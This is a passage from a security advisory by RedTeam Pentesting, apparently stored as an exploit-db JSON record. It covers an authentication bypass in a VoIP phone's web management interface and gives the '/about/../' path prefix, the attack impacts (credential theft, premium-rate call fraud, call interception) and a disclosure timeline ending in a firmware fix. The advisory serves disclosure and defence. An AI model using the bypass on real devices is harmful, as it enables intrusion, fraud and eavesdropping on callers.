vulnerability.\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nInserting the prefix \"/about/../\" allows bypassing the authentication\r\ncheck for the web-based configuration management interface. This enables\r\nattackers to gain access to the login credentials used for\r\nauthentication at the PBX, among other data.\r\n\r\nAttackers can then authenticate at the PBX as the respective phone and\r\nfor example call premium rate phone lines they operate to generate\r\nrevenue. They can also configure a device they control as the PBX in the\r\nphone, so all incoming and outgoing phone calls are intercepted and can\r\nbe recorded. The device also contains a function to record all Ethernet\r\ndata traffic, which is likely affected as well.\r\n\r\nOverall, the vulnerability completely bypasses the authentication for\r\nthe web-based management interface and therefore poses a high risk.\r\n\r\n\r\nReferences\r\n==========\r\n\r\n[1] https://curl.se\r\n[2] https://github.com/zaproxy/zaproxy/\r\n\r\nTimeline\r\n========\r\n\r\n2021-08-26 Vulnerability identified\r\n2021-09-01 Customer approved disclosure to vendor\r\n2021-09-10 Vendor notified\r\n2021-09-10 CVE ID requested\r\n2021-09-10 CVE ID assigned\r\n2021-10-04 Vendor provides access to device with fixed firmware\r\n2021-10-05 RedTeam Pentesting examines device, vulnerability seems to be corrected\r\n2021-10-14 Vendor releases corrected firmware version 2.8G\r\n2021-12-06 Advisory published\r\n\r\n\r\nRedTeam Pentesting GmbH\r\n=======================\r\n\r\nRedTeam Pentesting offers individual penetration tests performed by a\r\nteam of specialised IT-security experts. In this way, security weaknesses in\r\ncompany networks or products are uncovered and can be fixed immediately.\r\n\r\nAs there are only a few experts in this field, RedTeam Pentesting wants to\r\nshare its knowledge and enhance the public knowledge with research in\r\nsecurity-related areas. 
The results are made available as public\r\nsecurity advisories.\r\n\r\nMore information about RedTeam Pentesting can be found at:\r\nhttps://www.redteam-pentesting.de/\r\n\r\n\r\nWorking at RedTeam Pentesting\r\n=============================\r\n\r\nRedTeam Pentesting is looking for penetration testers to join our team\r\nin Aachen, Germany. If you are interested please visit:\r\nhttps://www.redteam-pentesting.de/jobs/\r\n\r\n\r\n-- \r\nRedTeam Pentesting GmbH Tel.: +49 241 510081-0\r\nDennewartstr. 25-27 Fax : +49 241 510081-99\r\n52068 Aachen https://www.redteam-pentesting.de\r\nGermany Registergericht: Aachen HRB 14004\r\nGesch\u00e4ftsf\u00fchrer: Patrick Hof, Jens Liebchen", "sourceHref": "https://www.exploit-db.com/download/50565", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}